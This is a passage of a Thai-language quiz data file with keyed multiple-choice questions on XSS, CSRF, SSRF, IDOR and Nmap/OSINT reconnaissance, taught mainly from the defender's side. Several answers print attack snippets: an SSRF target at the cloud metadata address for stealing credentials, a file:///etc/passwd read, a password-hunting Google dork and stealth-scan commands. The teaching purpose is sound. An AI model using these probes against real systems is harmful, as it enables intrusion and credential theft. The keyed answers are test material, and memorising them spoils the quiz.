      ],
      correctAnswer: 'A',
      explanation: 'Template engines ส่วนใหญ่จะ Escape ข้อมูลเป็นค่าเริ่มต้น แต่หากใช้แท็ก Raw จะทำให้เปิดช่อง XSS ทันที',
      order: 15,
    },
    {
      question: 'เครื่องมือ "BeEF" (Browser Exploitation Framework) นิยมถูกนำมาใช้ในกิจกรรมใดที่เกี่ยวกับ XSS?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Hook เบราว์เซอร์ของเหยื่อที่โดน XSS เพื่อใช้เป็นฐานในการควบคุม, สำรวจเครือข่ายภายใน, และส่งคำสั่งโจมตีต่อ' },
        { key: 'B', text: 'เครื่องมือปรับแต่งความเร็วของ CSS' },
        { key: 'C', text: 'โปรแกรมตกแต่งภาพ' },
        { key: 'D', text: 'ระบบจัดการสต็อกสินค้า' },
      ],
      correctAnswer: 'A',
      explanation: 'BeEF เป็นเฟรมเวิร์กทดสอบเจาะระบบที่เน้นการใช้ประโยชน์จาก XSS เพื่อเข้าควบคุม Client Browser อย่างเต็มรูปแบบ',
      order: 16,
    },
    {
      question: 'เหตุใดการตรวจสอบ Input ด้วย Regular Expression (Regex) ฝั่งไคลเอนต์เพียงอย่างเดียวจึงไม่ปลอดภัยจาก XSS?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เพราะผู้โจมตีสามารถปิดการทำงานของ JavaScript หรือส่งคำขอผ่านเครื่องมืออย่าง Burp Suite / curl ข้ามฝั่งไคลเอนต์ได้โดยตรง' },
        { key: 'B', text: 'เพราะ Regex ทำงานเฉพาะบนคอมพิวเตอร์ Mac' },
        { key: 'C', text: 'เพราะ Regex ทำให้เบราว์เซอร์กินแรมมากเกินไป' },
        { key: 'D', text: 'เพราะตัวอักษรภาษาไทยไม่รองรับ Regex' },
      ],
      correctAnswer: 'A',
      explanation: 'มาตรการความปลอดภัยต้องบังคับใช้ที่เซิร์ฟเวอร์เสมอ (Server-side validation/encoding) เนื่องจาก Client-side controls สามารถบายพาสได้ง่ายมาก',
      order: 17,
    },
    {
      question: 'ในบริบทของ JSON API ช่องโหว่ XSS อาจเกิดขึ้นได้อย่างไรหากส่ง Content-Type ผิด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'หาก API ส่งคืนข้อมูลเป็น `text/html` แทนที่จะเป็น `application/json` ทำให้เบราว์เซอร์ตีความ JSON String ที่มีสคริปต์เป็นหน้าเว็บ' },
        { key: 'B', text: 'หากส่งไฟล์ JSON ที่มีขนาดเกิน 1KB' },
        { key: 'C', text: 'หากใช้ภาษา Python เขียน API' },
        { key: 'D', text: 'หากส่งคำขอด้วยพอร์ต 443' },
      ],
      correctAnswer: 'A',
      explanation: 'การระบุ `Content-Type: application/json` ที่ถูกต้องจะป้องกันไม่ให้เบราว์เซอร์พยายามเรนเดอร์ข้อมูลเป็นหน้าเว็บ HTML',
      order: 18,
    },
    {
      question: 'การใช้ฟังก์ชัน `encodeURIComponent()` ใน JavaScript เหมาะสำหรับการป้องกัน XSS ในบริบทใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เมื่อนำตัวแปรไปใส่เป็นค่า Query Parameter ใน URL เพื่อป้องกันการแทรกตัวอักษรควบคุมของ URL' },
        { key: 'B', text: 'เมื่อนำตัวแปรไปใส่ในแท็ก <body> ของ HTML' },
        { key: 'C', text: 'เมื่อนำตัวแปรไปใส่ในไฟล์ CSS' },
        { key: 'D', text: 'เมื่อบันทึกข้อมูลลงฐานข้อมูล' },
      ],
      correctAnswer: 'A',
      explanation: 'encodeURIComponent แปลงตัวอักษรพิเศษของ URI ให้เป็น Percent-encoding (%20, %26) เหมาะสำหรับการสร้าง URL parameters ที่ปลอดภัย',
      order: 19,
    },
    {
      question: 'เหตุใดการตั้งค่า CSP Directive script-src unsafe-inline จึงถือเป็น Anti-pattern ในการป้องกัน XSS?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เพราะเป็นการยกเลิกการบล็อก Inline Scripts ทำให้โค้ด <script> ที่ผู้โจมตีแทรกเข้ามาสามารถรันได้โดยตรง' },
        { key: 'B', text: 'เพราะทำให้หน้าเว็บไม่สามารถเปลี่ยนสีได้' },
        { key: 'C', text: 'เพราะทำให้เบราว์เซอร์ปิดตัวลง' },
        { key: 'D', text: 'เพราะต้องจ่ายเงินค่าใบรับรอง' },
      ],
      correctAnswer: 'A',
      explanation: 'unsafe-inline ทำลายหัวใจหลักของ CSP ในการสกัดกั้น XSS ควรใช้ Nonce หรือ Hash แทน',
      order: 20,
    },
  ],

  // 3. CSRF, SSRF & IDOR
  'lesson-i1-3': [
    {
      question: 'ช่องโหว่ Cross-Site Request Forgery (CSRF) คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การหลอกล่อให้เบราว์เซอร์ของเหยื่อส่งคำขอที่เปลี่ยนสถานะ (เช่น โอนเงิน, เปลี่ยนรหัสผ่าน) ไปยังเว็บเป้าหมายโดยที่เหยื่อไม่ได้ตั้งใจ โดยอาศัย Session ที่ล็อกอินค้างอยู่' },
        { key: 'B', text: 'การแฮกเราเตอร์ Wi-Fi เพื่อเปลี่ยนรหัสผ่าน' },
        { key: 'C', text: 'การขโมยไฟล์ฐานข้อมูลผ่านหน้าบ้าน' },
        { key: 'D', text: 'การยิงทราฟฟิกจนเซิร์ฟเวอร์ดับ' },
      ],
      correctAnswer: 'A',
      explanation: 'CSRF อาศัยความเชื่อใจที่เซิร์ฟเวอร์มีต่อเบราว์เซอร์ของเหยื่อ (ผ่านคุกกี้ Session อัตโนมัติ) เพื่อแอบทำธุรกรรมแทนผู้ใช้',
      order: 1,
    },
    {
      question: 'กลไก "Anti-CSRF Token (Synchronizer Token Pattern)" ทำงานอย่างไรในการป้องกัน CSRF?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'สร้างโทเค็นลับแบบสุ่มผูกกับเซสชันของผู้ใช้ และบังคับให้ฟอร์มต้องส่งโทเค็นนี้มาพร้อมกับคำขอเพื่อตรวจสอบความถูกต้องบนเซิร์ฟเวอร์' },
        { key: 'B', text: 'การตั้งรหัสผ่านให้ยาวขึ้น 2 เท่า' },
        { key: 'C', text: 'การบล็อกผู้ใช้ไม่ให้ส่งฟอร์ม' },
        { key: 'D', text: 'การรีสตาร์ทเซิร์ฟเวอร์ทุกครั้งที่มีการส่งข้อมูล' },
      ],
      correctAnswer: 'A',
      explanation: 'เนื่องจากเว็บไซต์ของผู้โจมตีไม่สามารถอ่าน Anti-CSRF Token ของผู้ใช้ได้ (ติด Same-Origin Policy) จึงไม่สามารถปลอมแปลงคำขอที่สมบูรณ์ได้',
      order: 2,
    },
    {
      question: 'ช่องโหว่ Server-Side Request Forgery (SSRF) คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ช่องโหว่ที่ผู้โจมตีสามารถบังคับหรือหลอกให้เซิร์ฟเวอร์หลังบ้านส่งคำขอ HTTP ไปยังทรัพยากรภายในหรือภายนอกที่บุคคลภายนอกเข้าไม่ถึง' },
        { key: 'B', text: 'การแอบดูหน้าจอของพนักงาน' },
        { key: 'C', text: 'การเปลี่ยนสีหน้าเว็บ' },
        { key: 'D', text: 'การกดปุ่ม Back บนเบราว์เซอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'SSRF เกิดขึ้นเมื่อเซิร์ฟเวอร์ดึงข้อมูลจาก URL ตามที่ผู้ใช้ป้อน ทำให้แฮกเกอร์สั่งให้เซิร์ฟเวอร์ไปดึงข้อมูลจากเครือข่ายภายใน เช่น 127.0.0.1 หรือ Cloud Metadata',
      order: 3,
    },
    {
      question: 'ในสภาพแวดล้อม Cloud (AWS, GCP, Azure) ผู้โจมตีมักใช้ SSRF มุ่งเป้าไปที่ IP Address ใดเพื่อขโมย IAM Roles / Access Tokens?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`http://169.254.169.254` (Instance Metadata Service - IMDS)' },
        { key: 'B', text: '`http://8.8.8.8`' },
        { key: 'C', text: '`http://1.1.1.1`' },
        { key: 'D', text: '`http://192.168.0.1`' },
      ],
      correctAnswer: 'A',
      explanation: '169.254.169.254 เป็น Link-local IP สำหรับดึง Metadata ของ Cloud VM ซึ่งเก็บ Security Credentials และ Token ของเครื่อง',
      order: 4,
    },
    {
      question: 'ช่องโหว่ "Insecure Direct Object References" (IDOR / BOLA) คืออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การที่ระบบอ้างอิงอ็อบเจกต์ตรงๆ ผ่านพารามิเตอร์ (เช่น `GET /api/documents/1052`) โดยไม่มีการตรวจสอบสิทธิ์ว่าผู้ใช้ปัจจุบันมีอำนาจเข้าถึงอ็อบเจกต์นั้นหรือไม่' },
        { key: 'B', text: 'การลืมใส่รหัสผ่าน Wi-Fi' },
        { key: 'C', text: 'การใช้ฮาร์ดดิสก์เก่าเกิน 5 ปี' },
        { key: 'D', text: 'การเขียนโค้ดโดยไม่แบ่งบรรทัด' },
      ],
      correctAnswer: 'A',
      explanation: 'IDOR หรือ Broken Object Level Authorization เปิดช่องให้ผู้ใช้ทั่วไปเพียงแค่เปลี่ยนตัวเลข ID ใน URL ก็สามารถดูหรือแก้ไขข้อมูลของคนอื่นได้ทันที',
      order: 5,
    },
    {
      question: 'แนวทางการแก้ไขช่องโหว่ IDOR ที่ถูกต้องและรัดกุมที่สุดคือข้อใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'บังคับตรวจสอบสิทธิ์การเป็นเจ้าของ (Object-level Authorization Check) บนเซิร์ฟเวอร์ทุกครั้งก่อนส่งหรือแก้ไขข้อมูล' },
        { key: 'B', text: 'การเปลี่ยน ID จากตัวเลขเป็น Base64' },
        { key: 'C', text: 'การซ่อนปุ่มแก้ไขในหน้าเว็บ' },
        { key: 'D', text: 'การเปลี่ยนชื่อโดเมน' },
      ],
      correctAnswer: 'A',
      explanation: 'เซิร์ฟเวอร์ต้องเช็คเสมอว่า Record ที่ร้องขอ (เช่น documentId) เป็นของผู้ใช้ที่เป็นเจ้าของ Session ปัจจุบัน (currentUser.id) จริงหรือไม่',
      order: 6,
    },
    {
      question: 'การใช้ UUIDv4 (Universally Unique Identifier) แทนตัวเลขออโต้รันนิ่ง (Sequential Integer IDs) ช่วยเรื่องใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ป้องกันการเดาหรือสุ่มรหัส ID ต่อเนื่อง (Enumeration) ได้ง่าย แต่ยังคงจำเป็นต้องมีการตรวจสอบสิทธิ์ (Authorization) ควบคู่เสมอ' },
        { key: 'B', text: 'ป้องกันช่องโหว่ IDOR ได้ 100% โดยไม่ต้องตรวจสอบสิทธิ์' },
        { key: 'C', text: 'ทำให้ฐานข้อมูลค้นหาข้อมูลได้เร็วขึ้น 10 เท่า' },
        { key: 'D', text: 'ช่วยลดขนาดไฟล์ฐานข้อมูล' },
      ],
      correctAnswer: 'A',
      explanation: 'UUID ช่วยกันการเดา ID สุ่ม (เช่น ไล่เลข 1, 2, 3...) แต่ไม่ใช่การแก้ IDOR ที่สมบูรณ์ เพราะถ้า UUID หลุดไปก็ยังเข้าถึงได้หากไม่มีการตรวจสิทธิ์',
      order: 7,
    },
    {
      question: 'AWS แก้ปัญหาการขโมย Credentials ผ่าน SSRF ด้วยการเปิดตัว "IMDSv2" ซึ่งมีกลไกป้องกันอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'บังคับให้ส่ง HTTP PUT Request เพื่อขอ Session Token ก่อน พร้อมกำหนด Header `X-aws-ec2-metadata-token-ttl-seconds`' },
        { key: 'B', text: 'ยกเลิกการใช้ Cloud Metadata ทั้งหมด' },
        { key: 'C', text: 'เปลี่ยน IP ของ Metadata ทุก 1 นาที' },
        { key: 'D', text: 'บังคับให้ล็อกอินด้วยลายนิ้วมือ' },
      ],
      correctAnswer: 'A',
      explanation: 'IMDSv2 ต้องใช้ Session-oriented method (PUT request with custom header) ซึ่งช่องโหว่ SSRF ธรรมดาส่วนใหญ่ไม่สามารถสร้างคำขอแบบนี้ได้',
      order: 8,
    },
    {
      question: 'แนวทางป้องกัน SSRF ที่ดีเมื่อเซิร์ฟเวอร์จำเป็นต้องดึงข้อมูลจาก URL ภายนอกคือข้อใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ทำ Whitelist โดเมนที่อนุญาต, Resolve DNS และบล็อก Private/Loopback IP ranges (เช่น 127.0.0.0/8, 10.0.0.0/8, 169.254.0.0/16)' },
        { key: 'B', text: 'อนุญาตให้ดึงข้อมูลได้ทุก URL โดยไม่มีเงื่อนไข' },
        { key: 'C', text: 'ปิดไฟร์วอลล์ของเซิร์ฟเวอร์' },
        { key: 'D', text: 'เปลี่ยนพอร์ตของเว็บเซิร์ฟเวอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'ต้องตรวจสอบ IP ปลายทางหลัง resolve DNS แล้ว เพื่อสกัดกั้นไม่ให้คำขอวิ่งเข้า Loopback, Private LAN หรือ Cloud Metadata',
      order: 9,
    },
    {
      question: 'เทคนิค "DNS Rebinding" ถูกนำมาใช้บายพาสตัวกรอง SSRF ได้อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'โดเมนตอบ IP สาธารณะในการตรวจสอบครั้งแรก แต่ตอบเป็น Local IP (127.0.0.1) เมื่อเซิร์ฟเวอร์ส่งคำขอจริงในจังหวะถัดไป' },
        { key: 'B', text: 'การเปลี่ยนชื่อโดเมนเป็นตัวพิมพ์ใหญ่' },
        { key: 'C', text: 'การส่งคำขอผ่านสายไฟเบอร์' },
        { key: 'D', text: 'การทำให้ DNS ดับ' },
      ],
      correctAnswer: 'A',
      explanation: 'DNS Rebinding ใช้ TTL ต่ำมาก (0 วินาที) เพื่อหลอกระบบตรวจเช็ค IP ให้ผ่านในรอบ Validation แต่คำขอตอน fetch จริงกลับวิ่งเข้าหาเครื่องตัวเอง',
      order: 10,
    },
    {
      question: 'แอตทริบิวต์ `SameSite=Lax` หรือ `Strict` บน Cookie ช่วยสกัดกั้น CSRF ได้อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เบราว์เซอร์จะไม่แนบคุกกี้นี้ไปกับคำขอข้ามเว็บไซต์ (Cross-site subrequests เช่น POST จากเว็บแฮกเกอร์)' },
        { key: 'B', text: 'ทำให้คุกกี้หมดอายุทันที' },
        { key: 'C', text: 'แปลงคุกกี้เป็นรหัสลับที่ไม่สามารถถอดได้' },
        { key: 'D', text: 'ลบคุกกี้ออกจากหน่วยความจำ' },
      ],
      correctAnswer: 'A',
      explanation: 'เมื่อไม่มีคุกกี้ Session แนบไปด้วย คำขอ CSRF ที่มาจากเว็บอื่นจะไม่ผ่านการยืนยันตัวตนบนเซิร์ฟเวอร์เป้าหมาย',
      order: 11,
    },
    {
      question: 'เทคนิค "Double Submit Cookie" สำหรับป้องกัน CSRF ทำงานอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ส่งโทเค็นสุ่มเก็บไว้ใน Cookie และให้ Client ส่งค่าเดียวกันแนบมาใน Request Header หรือ Body เพื่อให้เซิร์ฟเวอร์เทียบว่าตรงกันหรือไม่' },
        { key: 'B', text: 'การส่งคุกกี้สองชิ้นพร้อมกัน' },
        { key: 'C', text: 'การลบคุกกี้เก่าแล้วสร้างใหม่สองรอบ' },
        { key: 'D', text: 'การใช้คุกกี้ที่มีขนาดใหญ่เป็นสองเท่า' },
      ],
      correctAnswer: 'A',
      explanation: 'Double Submit Cookie นิยมใช้กับ SPA/Stateless API โดยอาศัยหลักการที่เว็บอื่นไม่สามารถอ่านหรือตั้งค่า Cookie ใน Domain ของเราได้',
      order: 12,
    },
    {
      question: 'หากเว็บแอปพลิเคชันมีช่องโหว่ XSS กลไกป้องกัน CSRF (เช่น Anti-CSRF Token) จะยังคงสามารถปกป้องระบบได้หรือไม่?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ไม่ได้: เพราะสคริปต์ XSS ทำงานในบริบทของเว็บ สามารถอ่านค่า Anti-CSRF Token และสร้างคำขอที่ถูกต้องได้ทั้งหมด' },
        { key: 'B', text: 'ได้: เพราะ CSRF Token ป้องกัน XSS ได้เสมอ' },
        { key: 'C', text: 'ได้: หากใช้เบราว์เซอร์ Chrome' },
        { key: 'D', text: 'ได้: หากเซิร์ฟเวอร์ใช้ Linux' },
      ],
      correctAnswer: 'A',
      explanation: 'XSS มีอำนาจสูงสุดฝั่งไคลเอนต์ สามารถสั่ง fetch() เพื่อดึงหน้าเว็บ อ่าน Token แล้วส่งคำขอแบบ Authenticated ได้อย่างสมบูรณ์',
      order: 13,
    },
    {
      question: 'เหตุใดการตรวจสอบเฉพาะ Header `Referer` หรือ `Origin` จึงอาจไม่เพียงพอในการป้องกัน CSRF ในบางกรณี?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Header Referer อาจถูกตัดทิ้งโดยนโยบาย Privacy ของเบราว์เซอร์ (Referrer-Policy) หรือถูกบายพาสได้หากการตั้งค่า Regex ตรวจสอบไม่รัดกุม' },
        { key: 'B', text: 'เพราะเบราว์เซอร์ไม่อนุญาตให้ใช้ Referer อีกต่อไป' },
        { key: 'C', text: 'เพราะ Referer ใช้ได้เฉพาะกับรูปภาพ' },
        { key: 'D', text: 'เพราะ Referer ทำให้เซิร์ฟเวอร์ล่ม' },
      ],
      correctAnswer: 'A',
      explanation: 'การตรวจสอบ Referer ควรใช้เป็นมาตรการเสริม (Defense-in-depth) ควบคู่กับ Anti-CSRF Token และ SameSite Cookie เสมอ',
      order: 14,
    },
    {
      question: 'ช่องโหว่ SSRF สามารถนำไปสู่ผลกระทบใดต่อไปนี้ได้?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Port Scanning ภายในเครือข่ายองค์กร, การอ่าน Internal Admin Panels, และการขโมย Cloud Instance Credentials' },
        { key: 'B', text: 'ทำให้หน้าจอของผู้โจมตีดับ' },
        { key: 'C', text: 'การเพิ่มความเร็วในการพิมพ์เอกสาร' },
        { key: 'D', text: 'การทำความสะอาดเคสคอมพิวเตอร์' },
      ],
      correctAnswer: 'A',
      explanation: 'SSRF เปลี่ยนเซิร์ฟเวอร์ให้กลายเป็น Proxy ของแฮกเกอร์ในการสำรวจและโจมตีระบบภายในที่คนนอกเข้าไม่ถึง',
      order: 15,
    },
    {
      question: 'URI Scheme ใดที่มักถูกใช้ในช่องโหว่ SSRF เพื่ออ่านไฟล์ภายในเครื่องเซิร์ฟเวอร์บนระบบที่รองรับ cURL?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`file:///etc/passwd`' },
        { key: 'B', text: '`mailto:admin@example.com`' },
        { key: 'C', text: '`tel:191`' },
        { key: 'D', text: '`sms:12345`' },
      ],
      correctAnswer: 'A',
      explanation: 'หากระบบไม่จำกัดโปรโตคอลให้อยู่แค่ http/https ผู้โจมตีอาจใช้ scheme `file://`, `gopher://` หรือ `dict://` ในการเข้าถึงข้อมูลลับ',
      order: 16,
    },
    {
      question: 'ข้อใดคือตัวอย่างของช่องโหว่ IDOR ในการเปลี่ยนรหัสผ่าน?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การส่ง `POST /api/user/password-reset` พร้อมระบุ `{"userId": 42, "newPassword": "123"}` โดยเซิร์ฟเวอร์ไม่ตรวจสอบว่าผู้ส่งคือ user 42 หรือไม่' },
        { key: 'B', text: 'การตั้งรหัสผ่านเป็นคำว่า password' },
        { key: 'C', text: 'การเปลี่ยนรหัสผ่านผ่าน Wi-Fi สาธารณะ' },
        { key: 'D', text: 'การลืมรหัสผ่านเดิม' },
      ],
      correctAnswer: 'A',
      explanation: 'หากเซิร์ฟเวอร์เชื่อใจ `userId` ใน Request Body โดยไม่อิงจาก Session ของผู้ที่ล็อกอินอยู่ ใครก็สามารถเปลี่ยนรหัสผ่านของบัญชีอื่นได้',
      order: 17,
    },
    {
      question: 'การโจมตีแบบ "Blind SSRF" หมายถึงอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'เซิร์ฟเวอร์ส่งคำขอไปจริง แต่ไม่มีการนำเนื้อหา Response ส่งกลับมาแสดงบนหน้าเว็บให้ผู้โจมตีเห็น' },
        { key: 'B', text: 'การโจมตีโดยไม่เปิดหน้าจอ' },
        { key: 'C', text: 'การโจมตีในห้องมืด' },
        { key: 'D', text: 'การโจมตีที่ไม่มีวันสำเร็จ' },
      ],
      correctAnswer: 'A',
      explanation: 'Blind SSRF ต้องใช้การสังเกต Time Delay หรือการดักรับ Connection ที่วิ่งออกไปยังเซิร์ฟเวอร์ภายนอก (Out-of-band / Collaborator) เพื่อยืนยันช่องโหว่',
      order: 18,
    },
    {
      question: 'ฟังก์ชัน "Export to PDF" หรือ "Generate Screenshot from URL" บนเว็บเซิร์ฟเวอร์ มักมีความเสี่ยงต่อช่องโหว่ใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'SSRF และ Local File Inclusion (LFI) ผ่านการสั่งให้ Headless Chrome เรนเดอร์ไฟล์ระบบหรือส่งคำขอไปหา 127.0.0.1' },
        { key: 'B', text: 'ฮาร์ดดิสก์เต็มทันที' },
        { key: 'C', text: 'หน้าจอเปลี่ยนเป็นสีขาวดำ' },
        { key: 'D', text: 'ไม่มีความเสี่ยงใดๆ' },
      ],
      correctAnswer: 'A',
      explanation: 'เครื่องมือเรนเดอร์ PDF เช่น wkhtmltopdf หรือ Puppeteer มักเปิดรับ HTML/URL ซึ่งหากไม่ระวังจะถูกสั่งให้อ่าน `file:///etc/passwd` หรือยิง SSRF ได้',
      order: 19,
    },
    {
      question: 'การป้องกัน CSRF บน REST API ที่ใช้ JWT (JSON Web Tokens) สามารถทำได้อย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ส่ง JWT ผ่าน Header `Authorization: Bearer <token>` แทนการเก็บใน Cookie (เนื่องจากเบราว์เซอร์จะไม่แนบ Header นี้ไปกับ Cross-origin requests อัตโนมัติ)' },
        { key: 'B', text: 'บันทึก JWT ไว้ใน URL' },
        { key: 'C', text: 'พิมพ์ JWT ลงบนกระดาษ' },
        { key: 'D', text: 'ลบ JWT ทิ้งหลังจากสร้าง 1 วินาที' },
      ],
      correctAnswer: 'A',
      explanation: 'คำขอ CSRF อัตโนมัติไม่สามารถสร้าง Custom Header ได้หากไม่มี CORS อนุญาต ทำให้การส่งโทเค็นผ่าน Authorization Header ปลอดภัยจาก CSRF',
      order: 20,
    },
  ],

  // 4. Reconnaissance & Port Scanning (Nmap, Nikto, OSINT)
  'lesson-i2-1': [
    {
      question: 'คำสั่ง Nmap พื้นฐานใดที่ใช้ทำการสแกนพอร์ตแบบ "TCP SYN Stealth Scan"?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`nmap -sS target.com`' },
        { key: 'B', text: '`nmap -sT target.com`' },
        { key: 'C', text: '`nmap -sU target.com`' },
        { key: 'D', text: '`nmap -sP target.com`' },
      ],
      correctAnswer: 'A',
      explanation: '`-sS` ส่งเฉพาะแพ็กเกจ SYN แล้วตอบ RST กลับเมื่อได้รับ SYN-ACK ทำให้ไม่เกิดการสร้าง Full Connection ช่วยลดการบันทึกใน Application Log',
      order: 1,
    },
    {
      question: 'Flag `-sV` ในคำสั่ง Nmap มีหน้าที่ทำอะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Version Detection (ตรวจสอบเวอร์ชันของบริการหรือซอฟต์แวร์ที่กำลังเปิดทำงานอยู่บนพอร์ตนั้น)' },
        { key: 'B', text: 'Speed Velocity (เพิ่มความเร็วการสแกน 100 เท่า)' },
        { key: 'C', text: 'Sound Volume (เปิดเสียงลำโพง)' },
        { key: 'D', text: 'Screen View (แสดงหน้าจอจำลอง)' },
      ],
      correctAnswer: 'A',
      explanation: '`-sV` ส่ง Probes เข้าไปสอบถาม Service Banner เพื่อระบุชื่อโปรแกรมและเวอร์ชันที่แน่ชัด (เช่น Apache 2.4.41 หรือ OpenSSH 8.2)',
      order: 2,
    },
    {
      question: 'คำสั่ง `nmap -p- target.com` มีความหมายอย่างไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'สแกนพอร์ต TCP ทั้งหมดตั้งแต่พอร์ต 1 ถึง 65535' },
        { key: 'B', text: 'สแกนเฉพาะพอร์ตที่ปิดอยู่' },
        { key: 'C', text: 'ยกเลิกการสแกนพอร์ตทั้งหมด' },
        { key: 'D', text: 'สแกนเฉพาะพอร์ต 80 เท่านั้น' },
      ],
      correctAnswer: 'A',
      explanation: '`-p-` เป็นคำสั่งย่อของ `-p 1-65535` เพื่อให้แน่ใจว่าจะไม่พลาดบริการแปลกปลอมที่แอบรันอยู่บนพอร์ตตัวเลขสูงๆ',
      order: 3,
    },
    {
      question: 'การระบุ Flag `-O` ใน Nmap มีวัตถุประสงค์เพื่ออะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'OS Detection (ตรวจจับระบบปฏิบัติการของเป้าหมายผ่านการวิเคราะห์ TCP/IP Fingerprinting)' },
        { key: 'B', text: 'Output file to Word' },
        { key: 'C', text: 'Offline mode' },
        { key: 'D', text: 'Only port 80' },
      ],
      correctAnswer: 'A',
      explanation: '`-O` วิเคราะห์การตอบสนองของ TCP/IP Stack เพื่อคาดเดาประเภทและเวอร์ชันของ OS (Linux, Windows, Cisco IOS)',
      order: 4,
    },
    {
      question: 'เครื่องมือ "Nikto" ถูกออกแบบมาเพื่อภารกิจด้านใดโดยเฉพาะ?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'Web Server Vulnerability Scanner (สแกนหาไฟล์อันตราย, ไฟล์คอนฟิกตกค้าง, และช่องโหว่บนเว็บเซิร์ฟเวอร์)' },
        { key: 'B', text: 'โปรแกรมแคร็กรหัสผ่าน Wi-Fi' },
        { key: 'C', text: 'ระบบป้องกันไวรัสบน Windows' },
        { key: 'D', text: 'เครื่องมือออกแบบหน้าเว็บ' },
      ],
      correctAnswer: 'A',
      explanation: 'Nikto เป็นเครื่องมือ Open Source ที่รวดเร็วสำหรับการสแกนหาไฟล์ตกค้าง (เช่น admin.php, .git, backup.zip) และค่าคอนฟิกที่ไม่ปลอดภัยของเว็บเซิร์ฟเวอร์',
      order: 5,
    },
    {
      question: 'แนวคิด "OSINT" (Open-Source Intelligence) หมายถึงกระบวนการใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'การรวบรวมและวิเคราะห์ข้อมูลข่าวกรองจากแหล่งข้อมูลสาธารณะที่เข้าถึงได้อย่างถูกกฎหมาย (เช่น ข้อมูลบริษัท, โซเชียลมีเดีย, DNS, CT Logs)' },
        { key: 'B', text: 'การเจาะระบบดาวเทียมทางทหาร' },
        { key: 'C', text: 'การขโมยฮาร์ดดิสก์จากห้องเซิร์ฟเวอร์' },
        { key: 'D', text: 'การติดตั้งซอฟต์แวร์เถื่อน' },
      ],
      correctAnswer: 'A',
      explanation: 'OSINT มุ่งเน้นการหาข้อมูลเป้าหมายจากข้อมูลสาธารณะ (Google Dorks, WHOIS, LinkedIn, Shodan, GitHub) ก่อนเริ่มการทดสอบเจาะระบบ',
      order: 6,
    },
    {
      question: 'เสิร์ชเอนจิน "Shodan" (shodan.io) มีความสามารถโดดเด่นด้านใด?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: 'ค้นหาและดัชนีอุปกรณ์ที่เชื่อมต่อกับอินเทอร์เน็ต (เช่น เซิร์ฟเวอร์, เราเตอร์, กล้องวงจรปิด, ระบบ SCADA/IoT) ตามพอร์ตและ Service Banner' },
        { key: 'B', text: 'ค้นหาไฟล์เพลง MP3 ฟรี' },
        { key: 'C', text: 'ค้นหาสูตรอาหารไทย' },
        { key: 'D', text: 'จองตั๋วเครื่องบินราคาประหยัด' },
      ],
      correctAnswer: 'A',
      explanation: 'Shodan เป็น Search Engine สำหรับอุปกรณ์ IoT และเซิร์ฟเวอร์ ช่วยให้นักวิจัยค้นหาอุปกรณ์ที่เปิดพอร์ตเสี่ยงสู่สาธารณะได้ทั่วโลก',
      order: 7,
    },
    {
      question: 'เทคนิค "Google Dorking" (Google Hacking) ข้อใดใช้ค้นหาไฟล์คอนฟิกที่มีรหัสผ่านรั่วไหลบนเว็บไซต์เป้าหมาย?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
        { key: 'A', text: '`site:example.com filetype:env OR filetype:sql "password"`' },
        { key: 'B', text: '`search:password in google`' },
        { key: 'C', text: '`find all files in example.com`' },
        { key: 'D', text: '`download:database.sql`' },
      ],
      correctAnswer: 'A',
      explanation: 'โอเปอเรเตอร์ขั้นสูงของ Google (site:, filetype:, intext:) ช่วยค้นหาไฟล์ลับ (.env, .sql, .log) ที่ผู้ดูแลระบบเผลอปล่อยให้ Index สู่สาธารณะ',
      order: 8,
    },
    {
      question: 'Nmap Scripting Engine (NSE) ด้วยคำสั่ง `nmap --script vuln target.com` มีหน้าที่อะไร?',
      questionType: 'MULTIPLE_CHOICE',
      options: [
